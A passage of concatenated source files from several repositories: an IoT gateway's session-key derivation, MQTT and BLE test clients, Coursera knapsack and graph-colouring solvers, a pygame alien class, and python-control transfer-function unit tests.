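nonce2 = os.urandom(16)                               # nonce returned (RSA-decrypted) by the A3C
session_key = bytes(map(operator.xor, r1, nonce2))    # K: XOR of the two nonces (as in the code)

r1_gw, r2_gw = os.urandom(16), os.urandom(16)         # nonces exchanged with the target GW
derived_key = hashlib.md5(session_key + r1_gw + r2_gw).digest()  # K' (assumed: MD5 over K||r1||r2)

# sign the base64-encoded payload so both endpoints HMAC exactly the same bytes
payload = base64.b64encode(str({"dh_uuid": "example"}).encode())
tag = hmac.new(derived_key, payload, hashlib.sha256).digest()    # digest choice is illustrative
assert hmac.compare_digest(tag, hmac.new(derived_key, payload, hashlib.sha256).digest())
```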
#### File: src/GW/MQTT_client.py
```python
import paho.mqtt.client as mqtt
def on_connect(mqttc, obj, flags, rc):
print("rc: " + str(rc))
def on_message(mqttc, obj, msg):
print(msg.topic + " " + str(msg.qos) + " " + str(msg.payload))
def on_publish(mqttc, obj, mid):
print("mid: " + str(mid))
def on_subscribe(mqttc, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(mqttc, obj, level, string):
print(string)
def main():
mqttc = mqtt.Client(client_id="", clean_session=True, userdata=None,transport="websockets")
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_publish = on_publish
mqttc.on_subscribe = on_subscribe
mqttc.on_log = on_log
mqttc.connect_async("localhost")
mqttc.subscribe('house/temperature')
mqttc.loop_forever()
if __name__ == "__main__":
main()
```
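Note that main() above calls subscribe() right after connect_async(); since the connection is only made once loop_forever() starts, the subscription may be attempted before the client is actually connected. The usual robust pattern with paho-mqtt is to subscribe inside on_connect, so the subscription is re-established on every (re)connect. To exercise the subscriber, a publisher along these lines can be used; it assumes the broker also exposes a plain TCP listener on 1883 (the client above connects over websockets).
```python
# Minimal publisher sketch for the house/temperature topic (assumes a TCP listener on 1883).
import paho.mqtt.client as mqtt

pub = mqtt.Client()                       # default TCP transport
pub.connect("localhost", 1883)
pub.loop_start()                          # run the network loop in a background thread
info = pub.publish("house/temperature", "21.5", qos=0)
info.wait_for_publish()                   # block until the message has left the client
pub.loop_stop()
pub.disconnect()
```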
#### File: GW/tests/ble_notify_test.py
```python
import bluepy.btle
import json
import time
from bluepy.btle import Scanner, DefaultDelegate, Peripheral
from struct import *
DH_ADDRESS = "30:AE:A4:EA:C2:C2"
class PeripheralDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleNotification(self,cHandle,data):
print("Notification received!")
print(data)
class ScanDelegate(DefaultDelegate):
def __init__(self):
DefaultDelegate.__init__(self)
def handleDiscovery(self,dev,isNewDev,isNewData):
if(isNewDev):
print("Discovered device: {}".format(dev.addr))
elif(isNewData):
print("Received new data from {}".format(dev.addr))
def main():
scanner = Scanner().withDelegate(ScanDelegate())
device_list = scanner.scan(5) # scan for 5 seconds
for device in device_list:
if(device.addr.lower() == DH_ADDRESS.lower()):
print("Target device host discovered!")
# RSSI = Received Signal Strength Indicator
#print("Device %s (%s), RSSI=%d dB" % (device.addr, device.addrType, device.rssi ))
scan_data = device.getScanData()
device_name = scan_data[2][2]
auth_service_uuid = scan_data[4][2]
#print(device_name)
#print(auth_service_uuid)
#for (adtype,desc,value) in device.getScanData():
# print("\t%s = %s" % (desc, value))
device = Peripheral(DH_ADDRESS)
device.setMTU(520)
device.setDelegate(PeripheralDelegate())
print("Successfully connected to device host")
auth_service = device.getServiceByUUID(auth_service_uuid)
auth_char = auth_service.getCharacteristics()[0]
# read authentication characteristic state
#print(auth_char.valHandle)
auth_char_cccd = auth_char.getHandle() + 1
print("CCCD 0x%X" % auth_char_cccd)
device.writeCharacteristic(auth_char_cccd, b"\x01\x00")
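# writing 0x0001 (little-endian) to the Client Characteristic Configuration Descriptor (CCCD)
# enables notifications for this characteristic; 0x0002 would request indications instead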
#device.withDelegate(PeripheralDelegate())
auth_char_val = auth_char.read()
print(auth_char_val)
#if(auth_char_val == 0):
## print("Zero")
# wait for server confirmation as a notification message
while True:
if(device.waitForNotifications(1.0)):
print("new notification from server")
continue
print("Waiting...")
if __name__ == "__main__":
main()
``` |
{
"source": "joaoandre/coursera",
"score": 3
} |
#### File: week2/knapsack/solver-old.py
```python
from collections import namedtuple
import queue
Item = namedtuple("Item", ['index', 'value', 'weight', 'density'])
# Node = namedtuple("Node", ["level", "profit", "bound", "weight"])
class Node(object):
def __init__(self, level=-1, profit=0, weight=0, bound=0):
self.level = level
self.profit = profit
self.weight = weight
self.bound = bound
def solve_it(input_data):
# Modify this code to run your optimization algorithm
# parse the input
lines = input_data.split('\n')
firstLine = lines[0].split()
item_count = int(firstLine[0])
capacity = int(firstLine[1])
items = []
weights = []
values = []
for i in range(1, item_count + 1):
line = lines[i]
parts = line.split()
v = int(parts[0])
w = int(parts[1])
d = v / w
weights.append(w)
values.append(v)
items.append(Item(i - 1, v, w, d))
# Sort the items
items = sorted(items, key=lambda x: x.density, reverse=True)
n = len(items)
value = bb_solution(items, capacity, n)
# print(value)
# prepare the solution in the specified output format
output_data = str(value) + ' ' + str(1) + '\n'
output_data += ' '.join(map(str, []))
return output_data
def greedy_solution(n, k, items):
value = 0
weight = 0
taken = [0] * n
for item in items:
if weight + item.weight <= k:
taken[item.index] = 1
value += item.value
weight += item.weight
return value, taken
def total_value(items, max_weight):
return sum([x.value for x in items]) if sum([x.weight for x in items]) <= max_weight else 0
# v = list of item values or profit
# w = list of item weight or cost
# W = max weight or max cost for the knapsack
def zeroOneKnapsack(v, w, W):
# c is the cost matrix
c = []
n = len(v)
c = zeros(n, W + 1)
for i in range(0, n):
# for every possible weight (capacity j)
for j in range(0, W + 1):
# can this item fit in a knapsack of capacity j?
if (w[i] > j):
c[i][j] = c[i - 1][j]
else:
c[i][j] = max(c[i - 1][j], v[i] + c[i - 1][j - w[i]])
return [c[n - 1][W], getUsedItems(w, c)]
# w = list of item weight or cost
# c = the cost matrix created by the dynamic programming solution
def getUsedItems(w, c):
# item count
i = len(c) - 1
currentW = len(c[0]) - 1
# set everything to not marked
marked = []
for i in range(i + 1):
marked.append(0)
while (i >= 0 and currentW >= 0):
if (i == 0 and c[i][currentW] > 0) or c[i][currentW] != c[i - 1][currentW]:
marked[i] = 1
currentW = currentW - w[i]
i = i - 1
return marked
def zeros(rows, cols):
row = []
data = []
for i in range(cols):
row.append(0)
for i in range(rows):
data.append(row[:])
return data
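# Note on bound() below: it is the fractional-knapsack relaxation. Starting from node u it
# greedily adds whole remaining items (the item list is pre-sorted by value density) and, once
# the next item no longer fits, adds its prorated value for the leftover capacity, giving an
# optimistic upper bound used to prune branches in bb_solution().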
def bound(u, n, max_weight, items):
if u.weight >= max_weight:
return 0
profit_bound = u.profit
j = u.level + 1
total_weight = u.weight
while j < n and total_weight + items[j].weight <= max_weight:
total_weight += items[j].weight
profit_bound += items[j].value
j += 1
if j < n:
profit_bound += (max_weight - total_weight) * items[j].density
return profit_bound
def bb_solution(items, max_weight, n):
q = queue.Queue()
v = Node()
_u = Node()
q.put(_u)
max_profit = 0
while not q.empty():
u = q.get()
if u.level == -1:
v.level = 0
if u.level == n-1:
continue
v.level = u.level + 1
v.weight = u.weight + items[v.level].weight
v.profit = u.profit + items[v.level].value
if v.weight <= max_weight and v.profit > max_profit:
max_profit = v.profit
v.bound = bound(v, n, max_weight, items)
if v.bound > max_profit:
q.put(v)
return max_profit
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print(
'This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/ks_4_0)')
```
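For reference, the recurrence that zeroOneKnapsack implements with a full table can be stated more compactly with a 1-D array iterated backwards. The snippet below is an illustrative restatement, not the assignment solver, checked on a small classic instance whose optimum is 220.
```python
# Compact 0/1 knapsack DP: dp[j] = best value achievable with capacity j so far.
def knapsack_dp(values, weights, capacity):
    dp = [0] * (capacity + 1)
    for v, w in zip(values, weights):
        for j in range(capacity, w - 1, -1):   # iterate backwards so each item is used at most once
            dp[j] = max(dp[j], v + dp[j - w])
    return dp[capacity]

if __name__ == "__main__":
    # classic instance: taking the 100- and 120-value items (weights 20 + 30) gives 220
    assert knapsack_dp([60, 100, 120], [10, 20, 30], 50) == 220
```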
#### File: week3/coloring/greedySolver1.py
```python
from random import choice
class Graph:
def __init__(self, vertices):
self.v = vertices
self.adj = {v: [] for v in range(0, vertices)}
def add_edge(self, v, w):
self.adj[v].append(w)
self.adj[w].append(v)
def get_degree(self, n):
return len(self.adj[n])
def get_group_by_degree(self, group):
return sorted(group, key=self.get_degree, reverse=True)
def greedy_coloring(self, order=None):
result = [-1] * self.v
start_index = order[0] if order else 0
available = [False] * self.v
if not order:
order = list(range(0, self.v))
result[start_index] = 0
for u in order[1:]:
for i in self.adj[u]:
if result[i] != -1:
available[result[i]] = True
for c in range(0, self.v):
if not available[c]:
# c += 1
break
result[u] = c
available = [False] * self.v
return result
def group_solution_by_color(self, solution):
color_map = {}
max_color = max(solution) + 1
for i, c in enumerate(solution):
if c not in color_map:
color_map[c] = [i]
continue
color_map[c].append(i)
return color_map, max_color
def solve_it(input_data):
# Modify this code to run your optimization algorithm
# parse the input
lines = input_data.split('\n')
first_line = lines[0].split()
node_count = int(first_line[0])
edge_count = int(first_line[1])
g = Graph(node_count)
edges = []
for i in range(1, edge_count + 1):
line = lines[i]
parts = line.split()
u, w = int(parts[0]), int(parts[1])
edges.append((u, w))
g.add_edge(u, w)
# iterated greedy colouring: each pass re-colours the graph using a vertex order
# built from the previous pass's colour classes (classes picked in random order, vertices sorted by degree)
order = []
for i in range(0, 3000):
solution = g.greedy_coloring(order)
order = []
color_map, highest_color = g.group_solution_by_color(solution)
colors = list(range(highest_color))
while len(colors) > 0:
c = colors.pop(choice(range(len(colors))))
order += g.get_group_by_degree(color_map[c])
# prepare the solution in the specified output format
output_data = str(max(solution) + 1) + ' ' + str(0) + '\n'
output_data += ' '.join(map(str, solution))
return output_data
import sys
if __name__ == '__main__':
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/gc_4_1)')
``` |
{
"source": "joaoantonio17/Space-war",
"score": 4
} |
#### File: Space-war/Projeto/aliens.py
```python
import pygame, random
class Alien():
def __init__(self, janela, Label):
# Stores the label that holds the character's life bars
self.Label = Label
# Converts the window into a rect so its coordinates can be used
self.janela = janela
self.janela_rect = self.janela.get_rect()
# Sets the alien image and a random starting position
self.alien = pygame.image.load("image/alien_1.png")
self.alien_rect = self.alien.get_rect()
X = random.randint(0, 16)
A = range(50, 900, 50)
B = range(-425, 0, 25)
self.alien_rect.x = A[X]
self.alien_rect.y = B[X]
def atualiza_alien(self):
# Moves the alien down; once it passes y=600 a life is lost and the alien is respawned at a new random position at the top, so it can be killed again
X = random.randint(0, 16)
A = range(50, 900, 50)
B = range(-1700, 0, 100)
if self.alien_rect.y < 600:
self.alien_rect.y += 3
else:
self.Label.C -= 1
self.alien_rect.x = A[X]
self.alien_rect.y = B[X]
def desenha_alien(self):
# Desenha os aliens na tela
self.janela.blit(self.alien, self.alien_rect)
def criar_aliens(Aliens, janela, Label):
# Controls the number of aliens on screen (creates a new one while there are fewer than 4)
if len(Aliens) < 4:
novo_alien = Alien(janela, Label)
novo_alien.desenha_alien()
Aliens.append(novo_alien)
``` |
{
"source": "joaoantoniocardoso/python-control",
"score": 3
} |
#### File: control/tests/xferfcn_test.py
```python
import unittest
import numpy as np
from control.statesp import StateSpace, _convertToStateSpace, rss
from control.xferfcn import TransferFunction, _convert_to_transfer_function, ss2tf
from control.lti import evalfr
from control.exception import slycot_check
# from control.lti import isdtime
class TestXferFcn(unittest.TestCase):
"""These are tests for functionality and correct reporting of the transfer
function class. Throughout these tests, we will give different input
formats to the TransferFunction constructor, to try to break it. These
tests have been verified in MATLAB."""
# Tests for raising exceptions.
def test_constructor_bad_input_type(self):
"""Give the constructor invalid input types."""
self.assertRaises(TypeError, TransferFunction, [[0., 1.], [2., 3.]], [[5., 2.], [3., 0.]])
def test_constructor_inconsistent_dimension(self):
"""Give the constructor a numerator and denominator of different
sizes."""
self.assertRaises(ValueError, TransferFunction, [[[1.]]], [[[1.], [2., 3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]]], [[[1.]], [[2., 3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]]],
[[[1.], [1., 2.]], [[5., 2.], [2., 3.]]])
def test_constructor_inconsistent_columns(self):
"""Give the constructor inputs that do not have the same number of
columns in each row."""
self.assertRaises(ValueError, TransferFunction, 1., [[[1.]], [[2.], [3.]]])
self.assertRaises(ValueError, TransferFunction, [[[1.]], [[2.], [3.]]], 1.)
def test_constructor_zero_denominator(self):
"""Give the constructor a transfer function with a zero denominator."""
self.assertRaises(ValueError, TransferFunction, 1., 0.)
self.assertRaises(ValueError, TransferFunction,
[[[1.], [2., 3.]], [[-1., 4.], [3., 2.]]],
[[[1., 0.], [0.]], [[0., 0.], [2.]]])
def test_add_inconsistent_dimension(self):
"""Add two transfer function matrices of different sizes."""
sys1 = TransferFunction([[[1., 2.]]], [[[4., 5.]]])
sys2 = TransferFunction([[[4., 3.]], [[1., 2.]]], [[[1., 6.]], [[2., 4.]]])
self.assertRaises(ValueError, sys1.__add__, sys2)
self.assertRaises(ValueError, sys1.__sub__, sys2)
self.assertRaises(ValueError, sys1.__radd__, sys2)
self.assertRaises(ValueError, sys1.__rsub__, sys2)
def test_mul_inconsistent_dimension(self):
"""Multiply two transfer function matrices of incompatible sizes."""
sys1 = TransferFunction([[[1., 2.], [4., 5.]], [[2., 5.], [4., 3.]]],
[[[6., 2.], [4., 1.]], [[6., 7.], [2., 4.]]])
sys2 = TransferFunction([[[1.]], [[2.]], [[3.]]], [[[4.]], [[5.]], [[6.]]])
self.assertRaises(ValueError, sys1.__mul__, sys2)
self.assertRaises(ValueError, sys2.__mul__, sys1)
self.assertRaises(ValueError, sys1.__rmul__, sys2)
self.assertRaises(ValueError, sys2.__rmul__, sys1)
# Tests for TransferFunction._truncatecoeff
def test_truncate_coefficients_non_null_numerator(self):
"""Remove extraneous zeros in polynomial representations."""
sys1 = TransferFunction([0., 0., 1., 2.], [[[0., 0., 0., 3., 2., 1.]]])
np.testing.assert_array_equal(sys1.num, [[[1., 2.]]])
np.testing.assert_array_equal(sys1.den, [[[3., 2., 1.]]])
def test_truncate_coefficients_null_numerator(self):
"""Remove extraneous zeros in polynomial representations."""
sys1 = TransferFunction([0., 0., 0.], 1.)
np.testing.assert_array_equal(sys1.num, [[[0.]]])
np.testing.assert_array_equal(sys1.den, [[[1.]]])
# Tests for TransferFunction.__neg__
def test_reverse_sign_scalar(self):
"""Negate a direct feedthrough system."""
sys1 = TransferFunction(2., np.array([-3.]))
sys2 = - sys1
np.testing.assert_array_equal(sys2.num, [[[-2.]]])
np.testing.assert_array_equal(sys2.den, [[[-3.]]])
def test_reverse_sign_siso(self):
"""Negate a SISO system."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1.])
sys2 = - sys1
np.testing.assert_array_equal(sys2.num, [[[-1., -3., -5.]]])
np.testing.assert_array_equal(sys2.den, [[[1., 6., 2., -1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_reverse_sign_mimo(self):
"""Negate a MIMO system."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
num3 = [[[-1., -2.], [0., -3.], [-2., 1.]],
[[-1.], [-4., 0.], [-1., 4., -3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys1 = TransferFunction(num1, den1)
sys2 = - sys1
sys3 = TransferFunction(num3, den1)
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys2.num[i][j], sys3.num[i][j])
np.testing.assert_array_equal(sys2.den[i][j], sys3.den[i][j])
# Tests for TransferFunction.__add__
def test_add_scalar(self):
"""Add two direct feedthrough systems."""
sys1 = TransferFunction(1., [[[1.]]])
sys2 = TransferFunction(np.array([2.]), [1.])
sys3 = sys1 + sys2
np.testing.assert_array_equal(sys3.num, 3.)
np.testing.assert_array_equal(sys3.den, 1.)
def test_add_siso(self):
"""Add two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[np.array([-1., 3.])]], [[[1., 0., -1.]]])
sys3 = sys1 + sys2
# If sys3.num is [[[0., 20., 4., -8.]]], then this is wrong!
np.testing.assert_array_equal(sys3.num, [[[20., 4., -8]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_add_mimo(self):
"""Add two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 0., -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
num3 = [[[3., -3., -6], [5., 6., 9.], [-4., -2., 2]],
[[3., 2., -3., 2], [-2., -3., 7., 2.], [1., -4., 3., 4]]]
den3 = [[[3., -2., -4.], [1., 2., 3., 0., 0.], [-2., -1., 1.]],
[[-12., -9., 6., 0., 0.], [2., -1., -1.], [1., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 + sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__sub__
def test_subtract_scalar(self):
"""Subtract two direct feedthrough systems."""
sys1 = TransferFunction(1., [[[1.]]])
sys2 = TransferFunction(np.array([2.]), [1.])
sys3 = sys1 - sys2
np.testing.assert_array_equal(sys3.num, -1.)
np.testing.assert_array_equal(sys3.den, 1.)
def test_subtract_siso(self):
"""Subtract two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[np.array([-1., 3.])]], [[[1., 0., -1.]]])
sys3 = sys1 - sys2
sys4 = sys2 - sys1
np.testing.assert_array_equal(sys3.num, [[[2., 6., -12., -10., -2.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
np.testing.assert_array_equal(sys4.num, [[[-2., -6., 12., 10., 2.]]])
np.testing.assert_array_equal(sys4.den, [[[1., 6., 1., -7., -2., 1.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_subtract_mimo(self):
"""Subtract two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 0., -1], [2.], [-1., -1.]],
[[1., 2.], [-1., -2.], [4.]]]
den2 = [[[-1.], [1., 2., 3.], [-1., -1.]],
[[-4., -3., 2.], [0., 1.], [1., 0.]]]
num3 = [[[-3., 1., 2.], [1., 6., 9.], [0.]],
[[-3., -10., -3., 2], [2., 3., 1., -2], [1., -4., 3., -4]]]
den3 = [[[3., -2., -4], [1., 2., 3., 0., 0.], [1]],
[[-12., -9., 6., 0., 0.], [2., -1., -1], [1., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 - sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__mul__
def test_multiply_scalar(self):
"""Multiply two direct feedthrough systems."""
sys1 = TransferFunction(2., [1.])
sys2 = TransferFunction(1., 4.)
sys3 = sys1 * sys2
sys4 = sys1 * sys2
np.testing.assert_array_equal(sys3.num, [[[2.]]])
np.testing.assert_array_equal(sys3.den, [[[4.]]])
np.testing.assert_array_equal(sys3.num, sys4.num)
np.testing.assert_array_equal(sys3.den, sys4.den)
def test_multiply_siso(self):
"""Multiply two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[[-1., 3.]]], [[[1., 0., -1.]]])
sys3 = sys1 * sys2
sys4 = sys2 * sys1
np.testing.assert_array_equal(sys3.num, [[[-1., 0., 4., 15.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 6., 1., -7., -2., 1.]]])
np.testing.assert_array_equal(sys3.num, sys4.num)
np.testing.assert_array_equal(sys3.den, sys4.den)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_multiply_mimo(self):
"""Multiply two MIMO systems."""
num1 = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den1 = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
num2 = [[[0., 1., 2.]],
[[1., -5.]],
[[-2., 1., 4.]]]
den2 = [[[1., 0., 0., 0.]],
[[-2., 1., 3.]],
[[4., -1., -1., 0.]]]
num3 = [[[-24., 52., -14., 245., -490., -115., 467., -95., -56., 12.,
0., 0., 0.]],
[[24., -132., 138., 345., -768., -106., 510., 41., -79., -69.,
-23., 17., 6., 0.]]]
den3 = [[[48., -92., -84., 183., 44., -97., -2., 12., 0., 0., 0., 0.,
0., 0.]],
[[-48., 60., 84., -81., -45., 21., 9., 0., 0., 0., 0., 0., 0.]]]
sys1 = TransferFunction(num1, den1)
sys2 = TransferFunction(num2, den2)
sys3 = sys1 * sys2
for i in range(sys3.outputs):
for j in range(sys3.inputs):
np.testing.assert_array_equal(sys3.num[i][j], num3[i][j])
np.testing.assert_array_equal(sys3.den[i][j], den3[i][j])
# Tests for TransferFunction.__div__
def test_divide_scalar(self):
"""Divide two direct feedthrough systems."""
sys1 = TransferFunction(np.array([3.]), -4.)
sys2 = TransferFunction(5., 2.)
sys3 = sys1 / sys2
np.testing.assert_array_equal(sys3.num, [[[6.]]])
np.testing.assert_array_equal(sys3.den, [[[-20.]]])
def test_divide_siso(self):
"""Divide two SISO systems."""
sys1 = TransferFunction([1., 3., 5], [1., 6., 2., -1])
sys2 = TransferFunction([[[-1., 3.]]], [[[1., 0., -1.]]])
sys3 = sys1 / sys2
sys4 = sys2 / sys1
np.testing.assert_array_equal(sys3.num, [[[1., 3., 4., -3., -5.]]])
np.testing.assert_array_equal(sys3.den, [[[-1., -3., 16., 7., -3.]]])
np.testing.assert_array_equal(sys4.num, sys3.den)
np.testing.assert_array_equal(sys4.den, sys3.num)
def test_evalfr_siso(self):
"""Evaluate the frequency response of a SISO system at one frequency."""
sys = TransferFunction([1., 3., 5], [1., 6., 2., -1])
np.testing.assert_array_almost_equal(evalfr(sys, 1j),
np.array([[-0.5 - 0.5j]]))
np.testing.assert_array_almost_equal(evalfr(sys, 32j),
np.array([[0.00281959302585077 - 0.030628473607392j]]))
# Test call version as well
np.testing.assert_almost_equal(sys(1.j), -0.5 - 0.5j)
np.testing.assert_almost_equal(sys(32.j), 0.00281959302585077 - 0.030628473607392j)
# Test internal version (with real argument)
np.testing.assert_array_almost_equal(sys._evalfr(1.),
np.array([[-0.5 - 0.5j]]))
np.testing.assert_array_almost_equal(sys._evalfr(32.),
np.array([[0.00281959302585077 - 0.030628473607392j]]))
# Deprecated version of the call (should generate warning)
import warnings
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
sys.evalfr(1.)
assert len(w) == 1
assert issubclass(w[-1].category, PendingDeprecationWarning)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_evalfr_mimo(self):
"""Evaluate the frequency response of a MIMO system at one frequency."""
num = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys = TransferFunction(num, den)
resp = [[0.147058823529412 + 0.0882352941176471j, -0.75, 1.],
[-0.083333333333333, -0.188235294117647 - 0.847058823529412j,
-1. - 8.j]]
np.testing.assert_array_almost_equal(sys._evalfr(2.), resp)
# Test call version as well
np.testing.assert_array_almost_equal(sys(2.j), resp)
def test_freqresp_siso(self):
"""Evaluate the magnitude and phase of a SISO system at multiple frequencies."""
sys = TransferFunction([1., 3., 5], [1., 6., 2., -1])
truemag = [[[4.63507337473906, 0.707106781186548, 0.0866592803995351]]]
truephase = [[[-2.89596891081488, -2.35619449019234,
-1.32655885133871]]]
trueomega = [0.1, 1., 10.]
mag, phase, omega = sys.freqresp(trueomega)
np.testing.assert_array_almost_equal(mag, truemag)
np.testing.assert_array_almost_equal(phase, truephase)
np.testing.assert_array_almost_equal(omega, trueomega)
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_freqresp_mimo(self):
"""Evaluate the magnitude and phase of a MIMO system at multiple frequencies."""
num = [[[1., 2.], [0., 3.], [2., -1.]],
[[1.], [4., 0.], [1., -4., 3.]]]
den = [[[-3., 2., 4.], [1., 0., 0.], [2., -1.]],
[[3., 0., .0], [2., -1., -1.], [1.]]]
sys = TransferFunction(num, den)
true_omega = [0.1, 1., 10.]
true_mag = [[[0.496287094505259, 0.307147558416976, 0.0334738176210382],
[300., 3., 0.03], [1., 1., 1.]],
[[33.3333333333333, 0.333333333333333, 0.00333333333333333],
[0.390285696125482, 1.26491106406735, 0.198759144198533],
[3.01663720059274, 4.47213595499958, 104.92378186093]]]
true_phase = [[[3.7128711165168e-4, 0.185347949995695, 1.30770596539255],
[-np.pi, -np.pi, -np.pi], [0., 0., 0.]],
[[-np.pi, -np.pi, -np.pi],
[-1.66852323415362, -1.89254688119154, -1.62050658356412],
[-0.132989648369409, -1.1071487177940, -2.7504672066207]]]
mag, phase, omega = sys.freqresp(true_omega)
np.testing.assert_array_almost_equal(mag, true_mag)
np.testing.assert_array_almost_equal(phase, true_phase)
np.testing.assert_array_equal(omega, true_omega)
# Tests for TransferFunction.pole and TransferFunction.zero.
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_pole_mimo(self):
"""Test for correct MIMO poles."""
sys = TransferFunction([[[1.], [1.]], [[1.], [1.]]],
[[[1., 2.], [1., 3.]], [[1., 4., 4.], [1., 9., 14.]]])
p = sys.pole()
np.testing.assert_array_almost_equal(p, [-2., -2., -7., -3., -2.])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_double_cancelling_poles_siso(self):
H = TransferFunction([1, 1], [1, 2, 1])
p = H.pole()
np.testing.assert_array_almost_equal(p, [-1, -1])
# Tests for TransferFunction.feedback
def test_feedback_siso(self):
"""Test for correct SISO transfer function feedback."""
sys1 = TransferFunction([-1., 4.], [1., 3., 5.])
sys2 = TransferFunction([2., 3., 0.], [1., -3., 4., 0])
sys3 = sys1.feedback(sys2)
sys4 = sys1.feedback(sys2, 1)
np.testing.assert_array_equal(sys3.num, [[[-1., 7., -16., 16., 0.]]])
np.testing.assert_array_equal(sys3.den, [[[1., 0., -2., 2., 32., 0.]]])
np.testing.assert_array_equal(sys4.num, [[[-1., 7., -16., 16., 0.]]])
np.testing.assert_array_equal(sys4.den, [[[1., 0., 2., -8., 8., 0.]]])
@unittest.skipIf(not slycot_check(), "slycot not installed")
def test_convert_to_transfer_function(self):
"""Test for correct state space to transfer function conversion."""
A = [[1., -2.], [-3., 4.]]
B = [[6., 5.], [4., 3.]]
C = [[1., -2.], [3., -4.], [5., -6.]]
D = [[1., 0.], [0., 1.], [1., 0.]]
sys = StateSpace(A, B, C, D)
tfsys = _convert_to_transfer_function(sys)
num = [[np.array([1., -7., 10.]), np.array([-1., 10.])],
[np.array([2., -8.]), np.array([1., -2., -8.])],
[np.array([1., 1., -30.]), np.array([7., -22.])]]
den = [[np.array([1., -5., -2.]) for _ in range(sys.inputs)]
for _ in range(sys.outputs)]
for i in range(sys.outputs):
for j in range(sys.inputs):
np.testing.assert_array_almost_equal(tfsys.num[i][j], num[i][j])
np.testing.assert_array_almost_equal(tfsys.den[i][j], den[i][j])
def test_minreal(self):
"""Try the minreal function, and also test easy entry by creation
of a Laplace variable s"""
s = TransferFunction([1, 0], [1])
h = (s + 1) * (s + 2.00000000001) / (s + 2) / (s**2 + s + 1)
hm = h.minreal()
hr = (s + 1) / (s**2 + s + 1)
np.testing.assert_array_almost_equal(hm.num[0][0], hr.num[0][0])
np.testing.assert_array_almost_equal(hm.den[0][0], hr.den[0][0])
np.testing.assert_equal(hm.dt, hr.dt)
def test_minreal_2(self):
"""This one gave a problem, due to poly([]) giving simply 1
instead of numpy.array([1])"""
s = TransferFunction([1, 0], [1])
G = 6205/(s*(s**2 + 13*s + 1281))
Heq = G.feedback(1)
H1 = 1/(s+5)
H2a = Heq/H1
H2b = H2a.minreal()
hr = 6205/(s**2+8*s+1241)
np.testing.assert_array_almost_equal(H2b.num[0][0], hr.num[0][0])
np.testing.assert_array_almost_equal(H2b.den[0][0], hr.den[0][0])
np.testing.assert_equal(H2b.dt, hr.dt)
def test_minreal_3(self):
"""Regression test for minreal of tf([1,1],[1,1])"""
g = TransferFunction([1,1],[1,1]).minreal()
np.testing.assert_array_almost_equal(1.0, g.num[0][0])
np.testing.assert_array_almost_equal(1.0, g.den[0][0])
np.testing.assert_equal(None, g.dt)
def test_minreal_4(self):
